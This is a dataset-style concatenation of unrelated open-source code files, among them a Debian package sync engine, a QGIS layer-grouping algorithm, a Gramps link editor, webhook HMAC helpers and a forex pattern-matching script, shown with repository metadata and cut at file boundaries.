self.simulator.go(310)
self.assertEqual(self.nodes[COMMISSIONER].get_masterkey(), KEY2)
self.assertEqual(self.nodes[LEADER].get_masterkey(), KEY2)
self.assertEqual(self.nodes[ROUTER1].get_masterkey(), KEY2)
self.assertEqual(self.nodes[ED1].get_masterkey(), KEY2)
self.assertEqual(self.nodes[SED1].get_masterkey(), KEY2)
self.assertEqual(self.nodes[ROUTER2].get_masterkey(), KEY1)
self.nodes[ROUTER2].start()
self.simulator.go(5)
self.assertEqual(self.nodes[ROUTER2].get_state(), 'leader')
if __name__ == '__main__':
unittest.main()
|
sigurdga/samklang-menu | samklang_menu/widgets.py | Python | agpl-3.0 | 420 | 0 | class Widget(obje | ct):
def __init__(self, options, *args, **kwargs):
super(Widget, self).__init__(*args, **kwargs)
self.options = options
def get_display_name(self):
raise NotImplementedError
|
def render(self, request):
raise NotImplementedError
def render_option_form(self):
raise NotImplementedError
def get_option_dict(self):
return self.options
|
arve0/leicacam | async_client.py | Python | mit | 715 | 0 | """Test client using asyncio."""
import asyncio
from leicacam.async_cam import AsyncCAM
async def run(loop):
"""Run client."""
cam = AsyncCAM(loop=loop)
await cam.connect()
print(cam.welcome_msg)
await cam.send(b"/cmd:deletelist")
print(await cam.receive())
await cam.send(b"/cmd:deletelist")
print(await cam.wai | t_for(cmd="cmd", timeout=0.1))
await cam.send(b"/cmd:deletelist")
print(await cam.wait_for(cmd="cmd", timeout=0))
print(await cam.wait_for(cmd="cmd", timeout=0.1))
print(await cam.wait_for(cmd="test", timeout=0.1))
cam.close()
if __na | me__ == "__main__":
LOOP = asyncio.new_event_loop()
LOOP.run_until_complete(run(LOOP))
LOOP.close()
|
lkorigin/laniakea | src/synchrotron/synchrotron/syncengine.py | Python | gpl-3.0 | 24,637 | 0.003937 | # Copyright (C) 2016-2020 Matthias Klumpp <matthias@tenstral.net>
#
# Licensed under the GNU Lesser General Public License Version 3
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the license, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
import re
from typing import List
from apt_pkg import version_compare
from laniakea import LocalConfig, LkModule
from laniakea.repository import Repository, make_newest_packages_dict, version_revision
from laniakea.db import session_scope, config_get_distro_tag, \
ArchiveSuite, ArchiveComponent, ArchiveArchitecture, SourcePackage, SynchrotronIssue, \
SynchrotronIssueKind, SynchrotronSource, SynchrotronConfig, SyncBlacklistEntry
from laniakea.dakbridge import DakBridge
from laniakea.logging import log
from laniakea.msgstream import EventEmitter
class SyncEngine:
'''
Execute package synchronization in Synchrotron
'''
def __init__(self, target_suite_name: str, source_suite_name: str):
self._lconf = LocalConfig()
self._dak = DakBridge()
# FIXME: Don't hardcode this!
repo_name = 'master'
# the repository of the distribution we import stuff into
self._target_repo = Repository(self._lconf.archive_root_dir,
repo_name)
self._target_repo.set_trusted(True)
self._target_suite_name = target_suite_name
self._source_suite_name = source_suite_name
self._distro_tag = config_get_distro_tag()
self._synced_source_pkgs = []
with session_scope() as session:
sync_source = session.query(SynchrotronSource) \
.filter(SynchrotronSource.suite_name == self._source_suite_name).one()
# FIXME: Synchrotron needs adjustments to work
# better with the new "multiple autosync tasks" model.
# This code will need to be revised for that
# (currently it is just a 1:1 translation from D code)
# the repository of the distribution we use to sync stuff from
self._source_repo = Repository(sync_source.repo_url,
sync_source.os_name,
self._lconf.synchrotron_sourcekeyrings)
# we trust everything by default
self._imports_trusted = True
with session_scope() as session:
self._sync_blacklist = set([value for value, in session.query(SyncBlacklistEntry.pkgname)])
def _publish_synced_spkg_events(self, src_os, src_suite, dest_suite, forced=False, emitter=None):
''' Submit events for the synced source packages to the message stream '''
if not emitter:
emitter = EventEmitter(LkModule.SYNCHROTRON)
for spkg in self._synced_source_pkgs:
data = {'name': spkg.name,
'version': spkg.version,
'src_os': src_os,
'suite_src': src_suite,
'suite_dest': dest_suite,
'forced': forced}
emitter.submit_event('src-package-imported', data)
def _get_repo_source_package_map(self, repo, suite_name: str, component_name: str):
''' Get an associative array of the newest source packages present in a repository. '''
suite = ArchiveSuite(suite_name)
component = ArchiveComponent(component_name)
spkgs = repo.source_packages(suite, component)
return make_newest_packages_dict(spkgs)
def _get_repo_binary_package_map(self, repo, suite_name: str, component_name: str,
arch_name: str = None, with_installer: bool = True):
''' Get an associative array of the newest binary packages present in a repository. '''
suite = ArchiveSuite(suite_name)
component = ArchiveComponent(component_name)
arch = ArchiveArchitecture(arch_name)
arch_all = ArchiveArchitecture('all')
bpkgs = repo.binary_packages(suite, component, arch)
bpkgs.extend(repo.binary_packages(suite, component, arch_all)) # always append arch:all packages
if with_installer:
# add d-i packages to the mix
bpkgs.extend(repo.installer_packages(suite, component, arch))
bpkgs.extend(repo.installer_packages(suite, component, arch_all)) # always append arch:all packages
return make_newest_packages_dict(bpkgs)
def _get_target_source_packages(self, component: str):
''' Get mapping of all sources packages in a suite and its parent suite. '''
with session_scope() as session:
target_suite = session.query(ArchiveSuite) \
.filter(ArchiveSuite.name == self._target_suite_name).one()
suite_pkgmap = self._get_repo_source_package_map(self._target_repo,
target_suite.name,
component)
if target_suite.parent:
# we have a parent suite
parent_map = self._get_repo_source_package_map(self._target_repo,
target_suite.parent.name,
component)
# merge the two arrays, keeping only the latest versions
suite_pkgmap = make_newest_packages_dict(list(parent_map.values()) + list(suite_pkgmap.values()))
return suite_pkgmap
def _import_package_files(self, suite: str, component: str, fnames: List[str]):
''' Import an arbitrary amount of packages via the archive management software. '''
return self._dak.import_package_files(suite, component, fnames, self._imports_trusted, True)
def _import_source_package(self, spkg: SourcePackage, component: str) -> bool:
'''
Import a source package from the source repository into the
target repo.
'''
dscfile = None
for f in spkg.files:
# the source repository might be on a remote location, so we need to
# request each file to be | the | re.
# (dak will fetch the files referenced in the .dsc file from the same directory)
if f.fname.endswith('.dsc'):
dscfile = self._source_repo.get_file(f)
self._source_repo.get_file(f)
if not dscfile:
log.error('Critical consistency error: Source package {} in repository {} has no .dsc file.'
.format(spkg.name, self._source_repo.base_dir))
return False
if self._import_package_files(self._target_suite_name, component, [dscfile]):
self._synced_source_pkgs.append(spkg)
return True
return False
def _import_binaries_for_source(self, sync_conf, target_suite, component: str, spkgs: List[SourcePackage],
ignore_target_changes: bool = False) -> bool:
''' Import binary packages for the given set of source packages into the archive. '''
if not sync_conf.sync_binaries:
log.debug('Skipping binary syncs.')
return True
# list of valid architectrures supported by the target
target_archs = [a.name for a in target_suite.architectures]
# cache of binary-package mappings for the source
src_bpkg_arch_map = {}
for aname in target_archs:
src_bpkg_arch_map[aname] = self._get_repo_binary_package_map(self._source_repo, self._source_suite_name, component, aname)
|
curly-brace/VkCheckerPy | vk_api/utils.py | Python | mit | 1,122 | 0.000941 | # -*- coding: utf-8 -*-
"""
@author: Kirill Python
@contact: https://vk.com/python273
@license Apache License, Version 2.0, see LICENSE file
Copyright (C) 2016
"""
try:
import simplejson as json
except ImportError:
| import json
def search_re(reg, string):
""" Поиск по регулярке """
s = reg.search(string)
if s:
groups = s.groups()
return groups[0]
def clean_string(s):
if s:
return s.strip().replace(' ', '')
def code_from_number(prefix, postfix, number):
prefix_len = len(prefix)
postfix_le | n = len(postfix)
if number[0] == '+':
number = number[1:]
if (prefix_len + postfix_len) >= len(number):
return
# Сравниваем начало номера
if number[:prefix_len] != prefix:
return
# Сравниваем конец номера
if number[-postfix_len:] != postfix:
return
return number[prefix_len:-postfix_len]
def sjson_dumps(*args, **kwargs):
kwargs['ensure_ascii'] = False
kwargs['separators'] = (',', ':')
return json.dumps(*args, **kwargs) |
obi-two/Rebelion | data/scripts/templates/object/tangible/hq_destructible/shared_power_regulator.py | Python | mit | 453 | 0.046358 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEAS | E SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/hq_destructible/shared_power_regulator.iff"
result.attribute_template_id = -1
result.stfName("hq","power_regulator")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
| return result |
lcoandrade/DsgTools | core/DSGToolsProcessingAlgs/Algs/LayerManagementAlgs/groupLayersAlgorithm.py | Python | gpl-2.0 | 8,547 | 0.000819 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
DsgTools
A QGIS plugin
Brazilian Army Cartographic Production Tools
-------------------
be | gin : | 2019-04-26
git sha : $Format:%H$
copyright : (C) 2019 by Philipe Borba -
Cartographic Engineer @ Brazilian Army
email : borba.philipe@eb.mil.br
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import os
from PyQt5.QtCore import QCoreApplication
from qgis.core import (QgsDataSourceUri, QgsExpression, QgsExpressionContext,
QgsExpressionContextUtils, QgsProcessing,
QgsProcessingAlgorithm,
QgsProcessingOutputMultipleLayers,
QgsProcessingParameterExpression,
QgsProcessingParameterMultipleLayers,
QgsProcessingParameterNumber,
QgsProcessingParameterString, QgsProject)
from qgis.utils import iface
class GroupLayersAlgorithm(QgsProcessingAlgorithm):
"""
Algorithm to group layers according to primitive, dataset and a category.
INPUT_LAYERS: list of QgsVectorLayer
CATEGORY_TOKEN: token used to split layer name
CATEGORY_TOKEN_INDEX: index of the split list
OUTPUT: list of outputs
"""
INPUT_LAYERS = 'INPUT_LAYERS'
CATEGORY_EXPRESSION = 'CATEGORY_EXPRESSION'
OUTPUT = 'OUTPUT'
def initAlgorithm(self, config):
"""
Parameter setting.
"""
self.addParameter(
QgsProcessingParameterMultipleLayers(
self.INPUT_LAYERS,
self.tr('Input Layers'),
QgsProcessing.TypeVector
)
)
self.addParameter(
QgsProcessingParameterExpression(
self.CATEGORY_EXPRESSION,
self.tr('Expression used to find out the category'),
defaultValue="regexp_substr(@layer_name ,'([^_]+)')"
)
)
self.addOutput(
QgsProcessingOutputMultipleLayers(
self.OUTPUT,
self.tr('Original reorganized layers')
)
)
def processAlgorithm(self, parameters, context, feedback):
"""
Here is where the processing itself takes place.
"""
inputLyrList = self.parameterAsLayerList(
parameters,
self.INPUT_LAYERS,
context
)
categoryExpression = self.parameterAsExpression(
parameters,
self.CATEGORY_EXPRESSION,
context
)
listSize = len(inputLyrList)
progressStep = 100/listSize if listSize else 0
rootNode = QgsProject.instance().layerTreeRoot()
inputLyrList.sort(key=lambda x: (x.geometryType(), x.name()))
geometryNodeDict = {
0 : self.tr('Point'),
1 : self.tr('Line'),
2 : self.tr('Polygon'),
4 : self.tr('Non spatial')
}
iface.mapCanvas().freeze(True)
for current, lyr in enumerate(inputLyrList):
if feedback.isCanceled():
break
rootDatabaseNode = self.getLayerRootNode(lyr, rootNode)
geometryNode = self.createGroup(
geometryNodeDict[lyr.geometryType()],
rootDatabaseNode
)
categoryNode = self.getLayerCategoryNode(
lyr,
geometryNode,
categoryExpression
)
lyrNode = rootNode.findLayer(lyr.id())
myClone = lyrNode.clone()
categoryNode.addChildNode(myClone)
# not thread safe, must set flag to FlagNoThreading
rootNode.removeChildNode(lyrNode)
feedback.setProgress(current*progressStep)
iface.mapCanvas().freeze(False)
return {self.OUTPUT: [i.id() for i in inputLyrList]}
def getLayerRootNode(self, lyr, rootNode):
"""
Finds the database name of the layer and creates (if not exists)
a node with the found name.
lyr: (QgsVectorLayer)
rootNode: (node item)
"""
uriText = lyr.dataProvider().dataSourceUri()
candidateUri = QgsDataSourceUri(uriText)
rootNodeName = candidateUri.database()
if not rootNodeName:
rootNodeName = self.getRootNodeName(uriText)
#creates database root
return self.createGroup(rootNodeName, rootNode)
def getRootNodeName(self, uriText):
"""
Gets root node name from uri according to provider type.
"""
if 'memory?' in uriText:
rootNodeName = 'memory'
elif 'dbname' in uriText:
rootNodeName = uriText.replace('dbname=', '').split(' ')[0]
elif '|' in uriText:
rootNodeName = os.path.dirname(uriText.split(' ')[0].split('|')[0])
else:
rootNodeName = 'unrecognised_format'
return rootNodeName
def getLayerCategoryNode(self, lyr, rootNode, categoryExpression):
"""
Finds category node based on category expression
and creates it (if not exists a node)
"""
exp = QgsExpression(categoryExpression)
context = QgsExpressionContext()
context.appendScopes(
QgsExpressionContextUtils.globalProjectLayerScopes(lyr)
)
if exp.hasParserError():
raise Exception(exp.parserErrorString())
if exp.hasEvalError():
raise ValueError(exp.evalErrorString())
categoryText = exp.evaluate(context)
return self.createGroup(categoryText, rootNode)
def createGroup(self, groupName, rootNode):
"""
Create group with the name groupName and parent rootNode.
"""
groupNode = rootNode.findGroup(groupName)
return groupNode if groupNode else rootNode.addGroup(groupName)
def name(self):
"""
Returns the algorithm name, used for identifying the algorithm. This
string should be fixed for the algorithm, and must not be localised.
The name should be unique within each provider. Names should contain
lowercase alphanumeric characters only and no spaces or other
formatting characters.
"""
return 'grouplayers'
def displayName(self):
"""
Returns the translated algorithm name, which should be used for any
user-visible display of the algorithm name.
"""
return self.tr('Group Layers')
def group(self):
"""
Returns the name of the group this algorithm belongs to. This string
should be localised.
"""
return self.tr('Layer Management Algorithms')
def groupId(self):
"""
Returns the unique ID of the group this algorithm belongs to. This
string should be fixed for the algorithm, and must not be localised.
The group id should be unique within each provider. Group id should
contain lowercase alphanumeric characters only and no spaces or other
formatting characters.
"""
return 'DSGTools: Layer Management Algorithms'
def tr(self, string):
"""
Translates input string.
"""
return QCoreApplication.translate('GroupLayersAlgorithm', string)
def createInstan |
zeeshanali/blaze | blaze/compute/ops/__init__.py | Python | bsd-3-clause | 136 | 0.007353 | # -*- coding: utf-8 | -*-
from __future__ import print_function, division, absolute_import
from .ufuncs import *
from .reduct | ion import * |
venthur/pyff | src/lib/speller/__init__.py | Python | gpl-2.0 | 4,287 | 0.000233 | __copyright__ = """ Copyright (c) 2011 Torsten Schmits
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
"""
import string
from lib.speller.trial import *
from lib.speller.input import *
from lib.speller.experiment import *
__all__ = ['Speller']
class Speller(object):
__stimulus = None
__sequences = None
__stim_gen = None
def __init__(self):
self.__init_attributes()
def __init_attributes(self):
self._trial_types = ['Calibration', 'FreeSpelling', 'CopySpelling']
# 1: Calibration 2: FreeSpelling 3: CopySpelling
self.trial_type = 3
self.phrases = ['BBCI_MATRIX']
self.symbols = string.ascii_uppercase + '_,.<'
self.delete_symbol = '<'
self.inter_trial = .1
self.inter_phrase = .1
# display countdown before each letter
self.trial_countdown = False
# display countdown before each phrase
self.phrase_countdown = True
self.countdown_symbol_duration = .1
self.countdown_start = 1
# allow classifier input to be simulated by keyboard
self.allow_keyboard_input = True
self.target_present_time = .1
def update_parameters(self):
super(Speller, self).update_parameters()
self._trial_name = self._trial_types[self.trial_type - 1]
self.setup_speller()
@classmethod
def stimulus(self, f):
self.__stimulus = f
return f
@classmethod
def stimulus_generator(self, **kw):
def decorate(f):
self.__stim_gen = f
ret | urn f
self.__stim_gen_kw = kw
return decorate
@classmethod
def sequences(self, f):
self.__sequences = f
return f
def setup_speller(self):
self._setup_trial()
self._setup_input_handler()
self._setup_experiment()
def _setup_trial(self):
| trial_type = self._trial_name + 'Trial'
self._trial = eval(trial_type)(self._view, self._trigger, self._iter,
self)
if self.__stimulus:
self._trial._sequence = getattr(self, self.__stimulus.__name__)
elif self.__stim_gen:
self._trial._sequence = self._stimulus_generator
self.__stimulus_generator = getattr(self, self.__stim_gen.__name__)
def _setup_input_handler(self):
input_handler_type = self._trial_name + 'InputHandler'
self._input_handler = eval(input_handler_type)(self)
def _setup_experiment(self):
experiment_type = self._trial_name + 'Experiment'
self._experiment = eval(experiment_type)(self._view, self._trial,
self.phrases,
self._input_handler,
self._flag, self._iter,
self)
if self.__sequences:
self._experiment._sequences = getattr(self,
self.__sequences.__name__)
def keyboard_input(self, event):
if self._trial.asking:
self._input_handler.keyboard(event)
super(Speller, self).keyboard_input(event)
def current_target(self):
return self._trial.current_target
def run(self):
self._experiment.run()
def on_control_event(self, data):
""" Classifier input. """
cls = data.get('cl_output', None)
if cls is not None:
self._input_handler.eeg_select(cls)
def _stimulus_generator(self, *a, **kw):
self.stimulus_sequence(self.__stimulus_generator(*a, **kw),
**self.__stim_gen_kw).run()
|
andyofmelbourne/crappy-crystals | utils/gpu/__init__.py | Python | gpl-3.0 | 15 | 0 | impo | rt phasin | g
|
MSusik/invenio | invenio/modules/webhooks/signatures.py | Python | gpl-2.0 | 1,447 | 0.010366 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Inven | io is free software | ; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
import re
import hmac
from hashlib import sha1
from invenio.base.globals import cfg
def get_hmac(message):
"""
Helper function which calculates HMAC value.
"""
key = str(cfg["WEBHOOKS_SECRET_KEY"])
hmac_value = hmac.new(key, message, sha1).hexdigest()
return hmac_value
def check_x_hub_signature(signature, message):
"""
Checks X-Hub-Signature. Secret key to compare
signature: WEBHOOKS_SECRET_KEY.
"""
hmac_value = get_hmac(message)
if hmac_value == signature or \
(signature.find('=') > -1 and \
hmac_value == signature[signature.find('=') + 1:]):
return True
return False |
ClinGen/clincoded | src/clincoded/upgrade/evidenceScore.py | Python | mit | 250 | 0 | from contentbase.upgrader import upgrade_step
@upgrade_step('evidenceScore', '1', '2')
def evidenceScore_1_2(val | ue, system):
# https://github.com/ClinGen/clincoded/issues/1507
# Add affiliation | property and update schema version
return
|
pmeier82/SpikePlot | spikeplot/plot_cluster.py | Python | mit | 3,737 | 0.002944 | # -*- coding: utf-8 -*-
#
# spikeplot - plot_cluster.py
#
# Philipp Meier <pmeier82 at googlemail dot com>
# 2011-09-29
#
"""scatter plot for clustering data"""
__docformat__ = 'restructuredtext'
__all__ = ['cluster']
##---IMPORTS
from .common import COLOURS, save_figure, check_plotting_handle, mpl, plt
##---FUNCTION
def cluster(data, data_dim=(0, 1), plot_handle=None, plot_mean=True,
colours=None, title=None, xlabel=None, ylabel=None, filename=None,
show=True):
"""plot a set of clusters with different colors each
:Parameters:
data : object
Preferably a dictionary with ndarray entries.
data_dim : tuple
A 2-tuple giving the dimension (entries per datapoint/columns) to
use for the scatter plot of the cluster.
plot_handle : figure or axis
A reference to a figure or axis, or None if one has to be created.
plot_mean : bool or float
If False, do nothing. If True or positive integer,
plot the cluster
means with a strong cross, if positive float, additionally plot a
unit circle of that radius (makes sense for prewhitened pca data),
thus interpreting the value as the std of the cluster.
Default=True
colours : list
List of colors in any matplotlib conform colour representation
Default=None
title : str
A title for the plot. No title if None or ''.
xlabel : str
A label for the x-axis. No label if None or ''.
ylabel : str
A label for the y-axis. No label if None or ''.
filename : str
It given and a valid path on the local system, save the figure.
show : bool
If True, show the figure.
:Returns:
matplotlib.figure
Reference th the figure plotted on
"""
# colour list
if colours is None:
col_lst = COLOURS
else:
col_lst = colours
# setup Figure if necessary
fig, ax = check_plotting_handle(plot_handle)
if not isinstance(data, dict):
data = {'0':data}
# plot single cluster members
col_idx = 0
for k in sorted(data.keys()):
ax.plot(
data[k][:, data_dim[0]],
data[k][:, data_dim[1]],
marker='.',
lw=0,
c=col_lst[col_idx % len(col_lst)])
col_idx += 1
# plot cluster means
if plot_mean is not False:
col_idx = 0
for k in sorted(data.keys()):
my_mean = data[k][:, data_dim].mean(axis=0)
ax.plot(
[my_mean[0]],
[my_mean[1]],
lw=0,
marker='x',
mfc=col_lst[col_idx % len(col_lst)],
ms=10,
| mew=1,
mec='k')
# plot density estimates
if plot_mean is not True:
ax.add_artist(
mpl.patches.Ellipse(
xy=my_mean,
width=plot_mean * 2,
| height=plot_mean * 2,
facecolor='none',
edgecolor=col_lst[col_idx % len(col_lst)]))
col_idx += 1
# fancy stuff
if title is not None:
ax.set_title(title)
if xlabel is not None:
ax.set_xlabel(xlabel)
if ylabel is not None:
ax.set_ylabel(ylabel)
# produce plots
if filename is not None:
save_figure(fig, filename, '')
if show is True:
plt.show()
return fig
##---MAIN
if __name__ == '__main__':
pass
|
dermoth/gramps | gramps/gui/editors/editlink.py | Python | gpl-2.0 | 9,653 | 0.002486 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2010 Doug Blank <doug.blank@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# python modules
#
#-------------------------------------------------------------------------
from gi.repository import Gtk
import re
#-------------------------------------------------------------------------
#
# gramps modules
#
#---------------------------------------------- | ---------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.sgettext
from ..managed | window import ManagedWindow
from ..display import display_help
from ..glade import Glade
from gramps.gen.simple import SimpleAccess
from gramps.gen.const import URL_MANUAL_SECT2
#-------------------------------------------------------------------------
#
# Constants
#
#-------------------------------------------------------------------------
WIKI_HELP_PAGE = URL_MANUAL_SECT2
WIKI_HELP_SEC = _('manual|Link_Editor')
WEB, EVENT, FAMILY, MEDIA, NOTE, PERSON, PLACE, REPOSITORY, SOURCE, CITATION = list(range(10))
OBJECT_MAP = {
EVENT: "Event",
FAMILY: "Family",
MEDIA: "Media",
NOTE: "Note",
PERSON: "Person",
PLACE: "Place",
REPOSITORY: "Repository",
SOURCE: "Source",
CITATION: "Citation",
}
#-------------------------------------------------------------------------
#
# EditLink class
#
#-------------------------------------------------------------------------
class EditLink(ManagedWindow):
def __init__(self, dbstate, uistate, track, url, callback):
self.url = url
self.dbstate = dbstate
self.simple_access = SimpleAccess(self.dbstate.db)
self.callback = callback
ManagedWindow.__init__(self, uistate, track, url, modal=True)
self._local_init()
self._connect_signals()
self.show()
def _local_init(self):
self.top = Glade()
self.set_window(self.top.toplevel,
self.top.get_object("title"),
_('Link Editor'))
self.setup_configs('interface.editlink', 600, 160)
self.uri_list = self.top.get_object('link_type')
for text in [_("Internet Address"), # 0 this order range above
_("Event"), # 1
_("Family"), # 2
_("Media"), # 3
_("Note"), # 4
_("Person"), # 5
_("Place"), # 6
_("Repository"), # 7
_("Source"), # 8
_("Citation"), # 9
]:
self.uri_list.append_text(text)
self.pick_item = self.top.get_object('button1')
self.new_button = self.top.get_object('new')
self.edit_button = self.top.get_object('edit')
self.selected = self.top.get_object('label1')
self.url_link = self.top.get_object('entry1')
self.uri_list.connect("changed", self._on_type_changed)
self.pick_item.connect("clicked", self._on_pick_one)
self.new_button.connect("clicked", self._on_new)
self.edit_button.connect("clicked", self._on_edit_one)
if self.url.startswith("gramps://"):
object_class, prop, value = self.url[9:].split("/", 2)
if object_class == "Event":
self.uri_list.set_active(EVENT)
elif object_class == "Family":
self.uri_list.set_active(FAMILY)
elif object_class == "Media":
self.uri_list.set_active(MEDIA)
elif object_class == "Note":
self.uri_list.set_active(NOTE)
elif object_class == "Person":
self.uri_list.set_active(PERSON)
elif object_class == "Place":
self.uri_list.set_active(PLACE)
elif object_class == "Repository":
self.uri_list.set_active(REPOSITORY)
elif object_class == "Source":
self.uri_list.set_active(SOURCE)
elif object_class == "Citation":
self.uri_list.set_active(CITATION)
# set texts:
self.selected.set_text(self.display_link(
object_class, prop, value))
self.url_link.set_text("gramps://%s/%s/%s" %
(object_class, prop, value))
else:
self.uri_list.set_active(WEB)
self.url_link.set_text(self.url)
self.url_link.connect("changed", self.update_ui)
def update_ui(self, widget):
url = self.url_link.get_text()
# text needs to have 3 or more chars://and at least one char
match = re.match(r"\w{3,}://\w+", url)
if match:
self.ok_button.set_sensitive(True)
else:
self.ok_button.set_sensitive(False)
def display_link(self, obj_class, prop, value):
return self.simple_access.display(obj_class, prop, value)
def _on_new_callback(self, obj):
object_class = obj.__class__.__name__
self.selected.set_text(self.display_link(
object_class, "handle", obj.handle))
self.url_link.set_text("gramps://%s/%s/%s" %
(object_class, "handle", obj.handle))
def _on_new(self, widget):
from ..editors import EditObject
object_class = OBJECT_MAP[self.uri_list.get_active()]
EditObject(self.dbstate,
self.uistate,
self.track,
object_class,
callback=self._on_new_callback)
def _on_edit_one(self, widget):
from ..editors import EditObject
uri = self.url_link.get_text()
if uri.startswith("gramps://"):
obj_class, prop, value = uri[9:].split("/", 2)
EditObject(self.dbstate,
self.uistate,
self.track,
obj_class, prop, value)
def _on_pick_one(self, widget):
from ..selectors import SelectorFactory
object_class = OBJECT_MAP[self.uri_list.get_active()]
Select = SelectorFactory(object_class)
uri = self.url_link.get_text()
default = None
if uri.startswith("gramps://"):
obj_class, prop, value = uri[9:].split("/", 2)
if object_class == obj_class:
if prop == "handle":
default = value
elif (prop == "gramps_id" and
object_class in OBJECT_MAP.values()):
person = self.dbstate.db.method('get_%s_from_gramps_id',
object_class)(value)
if person:
default = person.handle
d = Select(self.dbstate, self.uistate, self.track,
default=default)
result = d.run()
if result:
prop = "handle"
value = result.handle
self.selected.set_text(self.display_link(
object_class, prop, value))
self.url_link.set_text("gramps://%s/%s/%s" %
(object_class, prop, value))
def _on_type_changed(self, widget):
self.selected.set_text("")
if self.uri_list.get_active() == WEB:
self.url_link.set_sensitive(True)
self.pick_item.set_sensitive(False)
|
PythonProgramming/Pattern-Recognition-for-Forex-Trading | machFX10.py | Python | mit | 11,354 | 0.01189 | '''
main issue here was to global patforrec. youll probs forget.
'''
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
import matplotlib.dates as mdates
import numpy as np
from numpy import loadtxt
import time
totalStart = time.time()
date,bid,ask = np.loadtxt('GBPUSD1d.txt', unpack=True,
delimiter=',',
converters={0:mdates.strpdate2num('%Y%m%d%H%M%S')})
avgLine = ((bid+ask)/2)
patternAr = []
performanceAr = []
patForRec = []
def percentChange(startPoint,currentPoint):
try:
x = ((float(currentPoint)-startPoint)/abs(startPoint))*100.00
if x == 0.0:
return 0.000000001
else:
return x
except:
return 0.0001
def patternStorage():
'''
The goal of patternFinder is to begin collection of %change patterns
in the tick data. From there, we also collect the short-term outcome
of this pattern. Later on, the length of the pattern, how far out we
look to compare to, and the length of the compared range be changed,
and even THAT can be machine learned to find the best of all 3 by
comparing success rates.'''
startTime = time.time()
x = len(avgLine)-30
#dont forget to do y.... lol
y = 31
currentStance = 'none'
while y < x:
pattern = []
p1 = percentChange(avgLine[y-30], avgLine[y-29])
p2 = percentChange(avgLine[y-30], avgLine[y-28])
p3 = percentChange(avgLine[y-30], avgLine[y-27])
p4 = percentChange(avgLine[y-30], avgLine[y-26])
p5 = percentChange(avgLine[y-30], avgLine[y-25])
p6 = percentChange(avgLine[y-30], avgLine[y-24])
p7 = percentChange(avgLine[y-30], avgLine[y-23])
p8 = percentChange(avgLine[y-30], avgLine[y-22])
p9 = percentChange(avgLine[y-30], avgLine[y-21])
p10= percentChange(avgLine[y-30], avgLine[y-20])
p11 = percentChange(avgLine[y-30], avgLine[y-19])
p12 = percentChange(avgLine[y-30], avgLine[y-18])
p13 = percentChange(avgLine[y-30], avgLine[y-17])
p14 = percentChange(avgLine[y-30], avgLine[y-16])
p15 = percentChange(avgLine[y-30], avgLine[y-15])
p16 = percentChange(avgLine[y-30], avgLine[y-14])
p17 = percentChange(avgLine[y-30], avgLine[y-13])
p18 = percentChange(avgLine[y-30], avgLine[y-12])
p19 = percentChange(avgLine[y-30], avgLine[y-11])
p20= percentChange(avgLine[y-30], avgLine[y-10])
p21 = percentChange(avgLine[y-30], avgLine[y-9])
p22 = percentChange(avgLine[y-30], avgLine[y-8])
p23 = percentChange(avgLine[y-30], avgLine[y-7])
p24 = percentChange(avgLine[y-30], avgLine[y-6])
p25 = percentChange(avgLine[y-30], avgLine[y-5])
p26 = percentChange(avgLine[y-30], avgLine[y-4])
p27 = percentChange(avgLine[y-30], avgLine[y-3])
p28 = percentChange(avgLine[y-30], avgLine[y-2])
p29 = percentChange(avgLine[y-30], avgLine[y-1])
p30= percentChange(avgLine[y-30], avgLine[y])
outcomeRange = avgLine[y+20:y+30]
currentPoint = avgLine[y]
try:
avgOutcome = reduce(lambda x, y: x + y, outcomeRange) / len(outcomeRange)
except Exception, e:
print str(e)
avgOutcome = 0
futureOutcome = percentChange(currentPoint, avgOutcome)
'''
print 'where we are historically:',currentPoint
print 'soft outcome of the horizon:',avgOutcome
print 'This pattern brings a future change of:',futureOutcome
print '_______'
